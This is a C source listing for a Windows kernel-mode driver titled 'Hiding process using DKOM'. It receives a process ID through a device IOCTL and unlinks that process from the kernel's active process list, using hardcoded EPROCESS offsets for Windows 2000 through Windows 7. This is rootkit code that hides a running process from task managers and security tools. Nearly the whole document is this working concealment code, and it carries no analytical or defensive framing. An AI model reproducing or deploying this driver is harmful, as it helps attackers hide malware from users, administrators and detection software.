Hiding process using DKOM

1. #include <ntifs.h>
2.  
3. typedef unsigned long      DWORD;
4. typedef unsigned char      BYTE;
5. typedef unsigned short int WORD;
6.  
7.  
8. typedef struct _LDR_DATA_TABLE_ENTRY {
9.   LIST_ENTRY    InLoadOrderLinks;
10.   LIST_ENTRY    InMemoryOrderLinks;
11.   LIST_ENTRY    InInitializationOrderLinks;
12.   PVOID      DllBase;
13.   PVOID      EntryPoint;
14.   ULONG      SizeOfImage;
15.   UNICODE_STRING  FullDllName;
16.   UNICODE_STRING  BaseDllName;
17.   ULONG      Flags;
18.   WORD       LoadCount;
19.   WORD       TlsIndex;
20.  
21.   union{
22.      LIST_ENTRY HashLinks;
23.      struct{
24.         PVOID SectionPointer;
25.         ULONG CheckSum;
26.      };
27.   };
28.  
29.   union{
30.      ULONG TimeDataStamp;
31.      PVOID LoadedImports;
32.   };
33.  
34.   //_ACTIVATION_CONTEXT * EntryPointActivationContext;
35.   PVOID PatchInformation;
36.   LIST_ENTRY ForwarderLinks;
37.   LIST_ENTRY ServiceTagLinks;
38.   LIST_ENTRY StaticLinks;
39. } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
40.  
41.  
42. #define DriverName L"\\Device\\HideProcess"
43. #define DosDeviceName L"\\DosDevices\\HideProcess"
44.  
45.  
46. NTSTATUS HideProcessByDKOM(IN DWORD dwTargetPID);
47.  
48.  
49. NTSTATUS CreateDriver(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
50. {
51.     return STATUS_SUCCESS;
52. }
53.  
54. NTSTATUS CloseDriver(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
55. {
56.     return STATUS_SUCCESS;
57. }
58.  
59. void UnloadDriver(PDRIVER_OBJECT pDriverObject)
60. {
61.     UNICODE_STRING uDosDeviceName;
62.  
63.     RtlInitUnicodeString(&uDosDeviceName, DosDeviceName);
64.  
65.     IoDeleteSymbolicLink(&uDosDeviceName);
66.     IoDeleteDevice(pDriverObject->DeviceObject);
67. }
68.  
69. NTSTATUS Unsupported(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
70. {
71.     return STATUS_NOT_SUPPORTED;
72. }
73.  
74. NTSTATUS IOCTLDispatch(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
75. {
76.     PIO_STACK_LOCATION pIoStack = NULL;
77.     PVOID pInBuffer = NULL;
78.     NTSTATUS NtStatus = STATUS_SUCCESS;
79.  
80.     pIoStack = IoGetCurrentIrpStackLocation(pIrp);
81.  
82.     switch (pIoStack->Parameters.DeviceIoControl.IoControlCode)
83.     {
84.  
85.  
86.     case 0x8000000: //Your Control Code
87.         pInBuffer = pIrp->AssociatedIrp.SystemBuffer;
88.         if(pInBuffer)
89.             NtStatus = HideProcessByDKOM(*(DWORD*)pInBuffer);
90.         goto END;
91.  
92.     default:
93.         goto END;
94.     }
95.  
96. END:
97.     pIrp->IoStatus.Status = STATUS_SUCCESS;
98.     pIrp->IoStatus.Information = 0;
99.  
100.     IoCompleteRequest(pIrp, IO_NO_INCREMENT);
101.  
102.     return NtStatus;
103. }
104.  
105. NTSTATUS HideProcessByDKOM(IN DWORD dwTargetPID)
106. {
107.     PLIST_ENTRY pPrevList, pCurrentList, pNextList;
108.     ULONG MajorVersion, MinorVersion, offset = 0x00;
109.     PEPROCESS pEprocess;
110.     NTSTATUS NtStatus = STATUS_SUCCESS;
111.  
112.     if(dwTargetPID == 0)
113.         return STATUS_SUCCESS;
114.  
115.     NtStatus = PsLookupProcessByProcessId((HANDLE)dwTargetPID, &pEprocess);
116.     if(!NT_SUCCESS(NtStatus))
117.     {
118.         return NtStatus;
119.     }
120.  
121.     //DebugPrint("EPROCESS:0x%08X\n",pEprocess);
122.  
123.     PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
124.     if(MajorVersion == 5 && MinorVersion == 0) //Windows 2000
125.         offset = 0xA0;
126.     else if(MajorVersion == 5 && MinorVersion == 1) //Windows XP
127.         offset = 0x88;
128.     else if(MajorVersion == 6 && MinorVersion == 0) //Windows Vista
129.         offset = 0xA0;
130.     else if(MajorVersion == 6 && MinorVersion == 1) //Windows 7
131.         offset = 0xB8;
132.     else {
133.         ObDereferenceObject(pEprocess);
134.         return STATUS_UNSUCCESSFUL;
135.     }
136.  
137.     if(offset == 0)
138.         return STATUS_UNSUCCESSFUL;
139.  
140.  
141.     //Hiding
142.     pCurrentList = (PLIST_ENTRY)((PUCHAR)pEprocess + offset);
143.     pPrevList    = (PLIST_ENTRY)pCurrentList->Blink;
144.     pNextList    = (PLIST_ENTRY)pCurrentList->Flink;
145.  
146.     pPrevList->Flink = (PLIST_ENTRY)pNextList;
147.     pNextList->Blink = (PLIST_ENTRY)pPrevList;
148.  
149.     pCurrentList->Flink = (PLIST_ENTRY)pCurrentList;
150.     pCurrentList->Blink = (PLIST_ENTRY)pCurrentList;
151.  
152.  
153.     ObDereferenceObject(pEprocess);
154.  
155.     return STATUS_SUCCESS;
156. }
157.  
158. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
159. {
160.     UNICODE_STRING uDriverName, uDosDeviceName;
161.     PDEVICE_OBJECT pDeviceObject;
162.     int            iIndex = 0;
163.     NTSTATUS NtStatus = STATUS_SUCCESS;
164.  
165.     RtlInitUnicodeString(&uDriverName, DriverName);
166.     RtlInitUnicodeString(&uDosDeviceName, DosDeviceName);
167.  
168.     NtStatus = IoCreateDevice(pDriverObject, 0, &uDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE,  &pDeviceObject);
169.     if(!NT_SUCCESS(NtStatus)){
170.         if(NtStatus != STATUS_WAIT_1){
171.             return NtStatus;
172.         }
173.     }
174.  
175.     for(iIndex = 0; iIndex < IRP_MJ_MAXIMUM_FUNCTION; iIndex++)
176.         pDriverObject->MajorFunction[iIndex] = Unsupported;
177.  
178.     pDriverObject->MajorFunction[IRP_MJ_CREATE] = CreateDriver;
179.     pDriverObject->MajorFunction[IRP_MJ_CLOSE]  = CloseDriver;
180.     pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IOCTLDispatch;
181.     pDriverObject->DriverUnload = UnloadDriver;
182.  
183.     pDeviceObject->Flags |= DO_DIRECT_IO;
184.     pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING);
185.  
186.     return STATUS_SUCCESS;
187. }